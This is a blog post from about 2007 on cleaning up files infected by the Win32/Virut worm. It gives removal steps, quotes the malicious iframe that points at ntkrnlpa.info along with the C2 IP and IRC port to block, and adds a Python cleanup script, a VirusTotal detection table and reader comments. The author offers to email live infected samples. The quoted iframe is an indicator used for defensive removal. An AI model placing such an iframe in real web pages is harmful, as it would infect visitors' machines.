I find it frustrating that most anti-virus products will delete or quarantine your infected files. I lost many projects because of this worm. Don't use "auto-clean/fix" online scanners if you value your projects. Below is a step-by-step fix for Win32/Virut. If you don't like manual editing you'll need a search-and-replace tool to remove the embedded code from the infected files.
- Make sure all of the infected (*.exe, Win32/Virtob) files have been quarantined.
- Optionally block outbound access to 78.109.19.139:80 and IRC port 65520 in your firewall settings.
- Disable your anti-virus, if any.
- Shut down your PC and start Windows in Safe Mode (press F8 or F5 after the BIOS screen).
- Search all files with *.htm, *.html, *.php and *.asp extensions, and delete or replace the following text (string):
<iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"></iframe>
Search and Replace Tools
- For Windows: there are lots of similar tools and I'm not sure which one to recommend, as most seem to do the same thing, so Google for "search-and-replace" and pick your best.
- For Cygwin or a *nix bash console: use sed commands to search and replace the string in all infected files.
- Python on Windows: you can try this solution.
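As an added example (not part of the original post or any tool it links to), here is a small Python script that does the search-and-replace from the steps above over a whole directory tree: it handles files as raw bytes so their encoding is left untouched, and keeps a .virut.bak copy of every file it rewrites. The tag it looks for is the one quoted above; tolerating whitespace and case differences around it is my assumption.

```python
"""Find and strip the injected Virut iframe from web files under a directory."""
from __future__ import annotations

import re
import shutil
from pathlib import Path

# The exact tag the post reports the worm appends to web files (copied from the post).
INJECTED = b'<iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"></iframe>'
# Assumption: match the same host and path but tolerate whitespace/case differences.
INJECTED_RE = re.compile(
    rb'<iframe\s+src="http://ntkrnlpa\.info/cr/\?i=1"\s+height="1"\s+width="1">'
    rb"\s*</iframe>\s*",
    re.IGNORECASE,
)
WEB_EXTS = {".htm", ".html", ".php", ".asp"}


def strip_injected(data: bytes) -> tuple[bytes, int]:
    """Return the content with every injected iframe removed, plus how many were removed."""
    return INJECTED_RE.subn(b"", data)


def clean_tree(root: str, backup: bool = True) -> dict[str, int]:
    """Walk `root`, rewrite every web file carrying the iframe, return {path: removed}.

    Files are read and written as bytes so the original encoding survives.
    With backup=True the untouched original is kept as <name>.virut.bak first.
    """
    cleaned: dict[str, int] = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTS:
            continue
        new_data, n = strip_injected(path.read_bytes())
        if n == 0:
            continue  # clean file, leave it alone
        if backup:
            shutil.copy2(path, path.with_name(path.name + ".virut.bak"))
        path.write_bytes(new_data)
        cleaned[str(path)] = n
    return cleaned


if __name__ == "__main__":
    import sys

    for p, n in clean_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(f"cleaned {p}: removed {n} injected iframe(s)")
```

Run it against a quarantined copy of the web root first and diff a few cleaned files against their .virut.bak copies before touching the live site.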
Win32/Virut Virustotal.com Results
| Antivirus | Version | Last Update | Result |
|---|---|---|---|
| AhnLab-V3 | 2007.11.12.0 | 2007.11.12 | - |
| AntiVir | 7.6.0.34 | 2007.11.12 | W32/Virut.AF |
| Authentium | 4.93.8 | 2007.11.10 | - |
| Avast | 4.7.1074.0 | 2007.11.11 | Win32:Virtob |
| AVG | 7.5.0.503 | 2007.11.11 | Win32/Virut |
| BitDefender | 7.2 | 2007.11.12 | Win32.Virtob.6.Gen |
| CAT-QuickHeal | 9.00 | 2007.11.12 | W32.Virut.K |
| ClamAV | 0.91.2 | 2007.11.12 | W32.Virut-5 |
| DrWeb | 4.44.0.09170 | 2007.11.12 | Win32.Virut.19 |
| eSafe | 7.0.15.0 | 2007.11.08 | - |
| eTrust-Vet | 31.2.5289 | 2007.11.12 | Win32/Virut.6375 |
| Ewido | 4.0 | 2007.11.12 | - |
| FileAdvisor | 1 | 2007.11.12 | - |
| Fortinet | 3.11.0.0 | 2007.10.19 | W32/Virut.AE |
| F-Prot | 4.4.2.54 | 2007.11.10 | W32/Injector.A.gen!Eldorado |
| F-Secure | 6.70.13030.0 | 2007.11.12 | Virus.Win32.Virut.ab |
| Ikarus | T3.1.1.12 | 2007.11.12 | Win32.Virtob.AS |
| Kaspersky | 7.0.0.125 | 2007.11.12 | Virus.Win32.Virut.ab |
| McAfee | 5160 | 2007.11.09 | W32/Virut.g |
| Microsoft | 1.3007 | 2007.11.12 | Virus:Win32/Virut.Q |
| NOD32v2 | 2653 | 2007.11.12 | - |
| Norman | 5.80.02 | 2007.11.09 | W32/Virut.W |
| Panda | 9.0.0.4 | 2007.11.11 | W32/Virutas.W |
| Prevx1 | V2 | 2007.11.12 | - |
| Rising | 20.18.02.00 | 2007.11.12 | Win32.Virut.z |
| Sophos | 4.23.0 | 2007.11.12 | W32/Vetor-G |
| Sunbelt | 2.2.907.0 | 2007.11.09 | VIPRE.Suspicious |
| Symantec | 10 | 2007.11.12 | W32.Virut.W |
| TheHacker | 6.2.9.124 | 2007.11.12 | W32/Virut.gen |
| VBA32 | 3.12.2.4 | 2007.11.11 | - |
| VirusBuster | 4.3.26:9 | 2007.11.11 | Win32.Virut.Gen.4 |
| Webwasher-Gateway | 6.0.1 | 2007.11.12 | Win32.Virut.AF |

Notes on Microsoft Windows Malicious Software Removal Tool
Updated on: Nov 20, 2007 by NoahArk
I have Win32/Virut files in my archive (for backup purposes). Last week I installed the Microsoft Windows Malicious Software Removal Tool v1.35 (Nov 13, 2007, KB890830).
Microsoft claims this tool can fix W32/Virut, but the result was much worse than I expected. It didn't detect Win32/Virut on my Windows XP SP2; instead, halfway through the scan it triggered the worm, which started spreading as Win32/Virtob and Virut[A-W] (infecting *.exe and *.html). I have removed all the Microsoft removal tools (MS Malicious Software Removal Tool, MS Defender, MS Baseline Security Analyzer). Microsoft's developers should know better how to prevent these types of infection; it is their own design flaw and their own products. I still keep the infected Win32/Virut files; if anyone needs them, please send an email to . My request to the Microsoft team: they should clean up this crappy worm so all those unfortunate clients (including me) won't have to hunt down pricey anti-virus solutions.

W32/Virut and ntkrnlpa.info
The worm started spreading in September 2006. After its one-year anniversary it is still in the wild, as if it will never stop.
I sent a letter to the ntkrnlpa.info ISP (hosting.ua), and they have shut the site down for good. Google is blocking the site too: it gives you a warning notice if you search for that particular URL.
This worm spreads via a simple HTML tag and increases the file size by around 8 KB. Because of this simple method and low damage, most anti-virus and security vendors label it as medium or low risk. That threat label is debatable.
Based on Wikipedia's "Usage share of web browsers" statistics, 81% of Internet users use Microsoft Internet Explorer (50% of this weblog's visitors are on IE too). IE doesn't block IFRAMEs, which can be a problem.
Imagine if some webmaster uploaded infected files to heavy-traffic websites like MySpace and Facebook. The result could be a disaster. Nobody wants to see that happen.
- November 12, 2007 at 12:35 pm
- February 8, 2008 at 10:58 am
2 Responses to “Fixes for files infected with Win32/virut.Virtob and Variants”
The problem in prevention of viruses like the Virut types is that they change the "bothosts" as well as the encryption with every new variant coming out. A possible good solution to prevent your machine from making unauthorized, unwanted connects by any unknown process or program is to have e.g. a ZoneAlarm firewall installed (which allows precise blocking of e.g. SMTP for specified programs - the default is 'blocked' -, specified port blocking (e.g. IRC), preventing and denying any unsolicited inbound traffic, as well as the adaptive IDENT port hiding (meaning this is a true stealth firewall) and specified security behavior concerning internet, intranet, local and safe zones, as well as a 5-step safety profile to set for specified programs).
Additionally the user is informed about every network action and access attempt - incoming as well as outgoing - with source, target, port and the program or process name which initiates the connection. Preventing spam-bot behavior means: only allow 'your' known mail programs to send mails. NEVER store ANY PASSWORDS on the machine or in the mail program! Set 'SMTP action' to 'password required' even if your SMTP provider doesn't need it (if so, this means anonymous SMTP is allowed, and then you have a BAD ISP which is really inviting spambots to spread their notorious garbage all around the world!).
Essential safety rules are still ignored by the ISP in such cases. In the same way, the customers of such an ISP are the victims of these. Go looking for another ISP if possible. All other programs should be blocked for SMTP (and IRC) protocols as well. That is essential these days to keep an infected machine quiet towards the internet even if it is eventually infected by some weird worm or botclient software. (Then your PC is called 'stoned' or, as it is also said by the security people, a so-called 'Zombie'.) Never allow HTTP or any other outgoing requests for other programs aside from your known browser, media players or file transfer, mail and chat programs. Be aware that especially 'Adware', 'Nag-Ware' and 'Spy-ware'-charged programs are always trying to 'phone home'!
The same goes for malware which attempts to reach, or at least listens to, its 'master hosts' (of course allow such for the safety facilities on your system to update themselves from their known code hosts). Using a hosts list which redirects the servers contained therein to nowhere (meaning the localhost) is also a good hint. This file is also protected from being tampered with (unauthorized deletions or additions by any software or website scripts) by third-party software (i.e. ZoneAlarm, McAfee, Nod32).
Hi there,
can you please email me these files? I just want to use them for learning purposes.
THANKS BUDDY